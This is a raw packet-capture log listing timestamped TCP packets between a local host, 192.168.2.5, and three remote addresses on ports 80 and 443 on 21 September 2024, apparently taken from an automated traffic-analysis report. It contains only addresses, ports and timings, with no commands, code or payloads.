                          Sep 21, 2024 15:15:04.560175896 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.560245037 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.564773083 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.564789057 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.564862967 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.564987898 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.565001965 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.565063953 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.569502115 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.569518089 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.569524050 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.569636106 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.569705963 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.569719076 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.569766998 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.574292898 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.574309111 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.574480057 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.574493885 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.574493885 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.574506998 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.574529886 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.574557066 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.579236984 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.579255104 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.579319000 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.579364061 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.579402924 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.579452991 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.584084034 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.584100962 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.584156036 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.584228039 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.584243059 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.584275007 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.589067936 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.589085102 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.589095116 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.589107990 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.589121103 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.589133978 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.589145899 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.589164019 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.589190960 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.589535952 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.589550018 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.589560032 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.589572906 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.589585066 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.589595079 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.589597940 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.589611053 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.589622021 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.589622974 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.589668989 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.590395927 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.590409994 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.590468884 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.650578976 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.650729895 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.650742054 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.650806904 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.650953054 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.650995970 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.651108027 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.651314020 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.651324987 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.651335955 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.651351929 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.651376009 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.651674986 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.651880026 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.651891947 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.651926994 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.652214050 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.652226925 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.652266979 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.652499914 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.652548075 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.652717113 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.652729988 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.652765036 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.653080940 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.653093100 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.653135061 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.653389931 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.653592110 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.653603077 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.653628111 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.653944969 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.653958082 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.653981924 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.654273033 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.654321909 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.654465914 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.654478073 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.654514074 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.655020952 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.655033112 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.655072927 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.655163050 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.655414104 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.655426025 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.655448914 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.655720949 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.655734062 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.655761003 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.656075001 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.656114101 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.656197071 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.656208038 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.656248093 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.656491995 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.656503916 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.656542063 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.657018900 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.657190084 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.657234907 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.657298088 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.657309055 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.657350063 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.657753944 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.657933950 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.657973051 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.658039093 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.658051968 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.658092022 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.658339024 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.658349991 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.658394098 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.658894062 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.659054995 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.659106970 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.659176111 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.659188032 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.659226894 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.659555912 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.659568071 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.659579992 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.659609079 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.659970999 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.660012960 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.660099030 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.660110950 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.660144091 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.660382986 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.660394907 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.660406113 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.660430908 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.660892963 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.660937071 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.661005974 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.661019087 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.661053896 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.661242008 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.661428928 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.661467075 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.661540031 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.661550999 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.661588907 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.661746979 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.661814928 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.661828041 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.661839962 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.661849022 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.661879063 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.662337065 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.662426949 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.662544012 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.741197109 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.741225958 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.741238117 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.741283894 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.741558075 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.741570950 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.741584063 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.741596937 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.741616011 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.741648912 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.741962910 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.741976023 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.741987944 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.742002010 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.742017984 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.742047071 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.742470980 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.742481947 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.742506981 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.742695093 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.742707014 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.742718935 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.742727995 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.742731094 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.742744923 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.742752075 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.742757082 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.742777109 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.743535995 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.743547916 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.743561029 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.743573904 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.743577003 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.743586063 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.743598938 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.743606091 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.743617058 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.744380951 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.744395018 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.744406939 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.744419098 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.744422913 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.744432926 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.744445086 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.744453907 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.744481087 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.745322943 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.745337009 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.745347977 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.745359898 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.745369911 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.745371103 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.745383024 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.745384932 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.745398045 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.745414972 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.745491982 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.746289015 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.746300936 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.746313095 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.746326923 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.746339083 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.746345043 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.746351004 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.746362925 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.746370077 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.746401072 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.747224092 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.747236013 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.747248888 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.747262001 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.747263908 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.747273922 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.747287035 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.747292042 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.747318029 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.748178959 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.748189926 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.748200893 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.748213053 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.748214960 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.748228073 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.748239040 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.748250961 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.748251915 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.748269081 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.748286009 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.749098063 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.749109030 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.749119997 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.749131918 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.749141932 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.749159098 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.749171972 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.749183893 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.749188900 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.749212027 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.749975920 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.749989033 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.749999046 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.750010967 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.750015020 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.750024080 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.750030994 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.750036001 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.750052929 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.750061989 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.750094891 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.750780106 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.750792980 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.750803947 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.750816107 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.750824928 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.750825882 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.750838041 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.750849009 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.750859976 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.750864029 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.750874996 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.750900030 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.751594067 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.751605988 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.751616001 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.751629114 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.751640081 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.751652002 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.751681089 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.751681089 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.751732111 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.803556919 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.884088993 CEST49705443192.168.2.5188.114.97.3
                          Sep 21, 2024 15:15:04.884133101 CEST44349705188.114.97.3192.168.2.5
                          Sep 21, 2024 15:15:04.884232998 CEST49705443192.168.2.5188.114.97.3
                          Sep 21, 2024 15:15:04.885487080 CEST49705443192.168.2.5188.114.97.3
                          Sep 21, 2024 15:15:04.885495901 CEST44349705188.114.97.3192.168.2.5
                          Sep 21, 2024 15:15:05.390420914 CEST44349705188.114.97.3192.168.2.5
                          Sep 21, 2024 15:15:05.390589952 CEST49705443192.168.2.5188.114.97.3
                          Sep 21, 2024 15:15:05.426383972 CEST49705443192.168.2.5188.114.97.3
                          Sep 21, 2024 15:15:05.426413059 CEST44349705188.114.97.3192.168.2.5
                          Sep 21, 2024 15:15:05.427453041 CEST44349705188.114.97.3192.168.2.5
                          Sep 21, 2024 15:15:05.476195097 CEST49705443192.168.2.5188.114.97.3
                          Sep 21, 2024 15:15:05.739765882 CEST49705443192.168.2.5188.114.97.3
                          Sep 21, 2024 15:15:05.739820004 CEST49705443192.168.2.5188.114.97.3
                          Sep 21, 2024 15:15:05.739924908 CEST44349705188.114.97.3192.168.2.5
                          Sep 21, 2024 15:15:06.180820942 CEST44349705188.114.97.3192.168.2.5
                          Sep 21, 2024 15:15:06.180923939 CEST44349705188.114.97.3192.168.2.5
                          Sep 21, 2024 15:15:06.181005955 CEST49705443192.168.2.5188.114.97.3
                          Sep 21, 2024 15:15:06.183482885 CEST49705443192.168.2.5188.114.97.3
                          Sep 21, 2024 15:15:06.183504105 CEST44349705188.114.97.3192.168.2.5
                          Sep 21, 2024 15:15:06.183516979 CEST49705443192.168.2.5188.114.97.3
                          Sep 21, 2024 15:15:06.183522940 CEST44349705188.114.97.3192.168.2.5
                          Sep 21, 2024 15:15:06.296252966 CEST49706443192.168.2.592.122.104.90
                          Sep 21, 2024 15:15:06.296294928 CEST4434970692.122.104.90192.168.2.5
                          Sep 21, 2024 15:15:06.296387911 CEST49706443192.168.2.592.122.104.90
                          Sep 21, 2024 15:15:06.296868086 CEST49706443192.168.2.592.122.104.90
                          Sep 21, 2024 15:15:06.296885014 CEST4434970692.122.104.90192.168.2.5
                          Sep 21, 2024 15:15:06.971966028 CEST4434970692.122.104.90192.168.2.5
                          Sep 21, 2024 15:15:06.972048044 CEST49706443192.168.2.592.122.104.90
                          Sep 21, 2024 15:15:06.975722075 CEST49706443192.168.2.592.122.104.90
                          Sep 21, 2024 15:15:06.975743055 CEST4434970692.122.104.90192.168.2.5
                          Sep 21, 2024 15:15:06.976171017 CEST4434970692.122.104.90192.168.2.5
                          Sep 21, 2024 15:15:06.977793932 CEST49706443192.168.2.592.122.104.90
                          Sep 21, 2024 15:15:07.023399115 CEST4434970692.122.104.90192.168.2.5
                          Sep 21, 2024 15:15:07.542678118 CEST4434970692.122.104.90192.168.2.5
                          Sep 21, 2024 15:15:07.542730093 CEST4434970692.122.104.90192.168.2.5
                          Sep 21, 2024 15:15:07.542769909 CEST4434970692.122.104.90192.168.2.5
                          Sep 21, 2024 15:15:07.542820930 CEST49706443192.168.2.592.122.104.90
                          Sep 21, 2024 15:15:07.542841911 CEST4434970692.122.104.90192.168.2.5
                          Sep 21, 2024 15:15:07.542871952 CEST49706443192.168.2.592.122.104.90
                          Sep 21, 2024 15:15:07.542911053 CEST49706443192.168.2.592.122.104.90
                          Sep 21, 2024 15:15:07.628768921 CEST4434970692.122.104.90192.168.2.5
                          Sep 21, 2024 15:15:07.628832102 CEST4434970692.122.104.90192.168.2.5
                          Sep 21, 2024 15:15:07.628861904 CEST49706443192.168.2.592.122.104.90
                          Sep 21, 2024 15:15:07.628874063 CEST4434970692.122.104.90192.168.2.5
                          Sep 21, 2024 15:15:07.628916025 CEST49706443192.168.2.592.122.104.90
                          Sep 21, 2024 15:15:07.641280890 CEST4434970692.122.104.90192.168.2.5
                          Sep 21, 2024 15:15:07.641350031 CEST4434970692.122.104.90192.168.2.5
                          Sep 21, 2024 15:15:07.641401052 CEST49706443192.168.2.592.122.104.90
                          Sep 21, 2024 15:15:07.641415119 CEST4434970692.122.104.90192.168.2.5
                          Sep 21, 2024 15:15:07.641453028 CEST49706443192.168.2.592.122.104.90
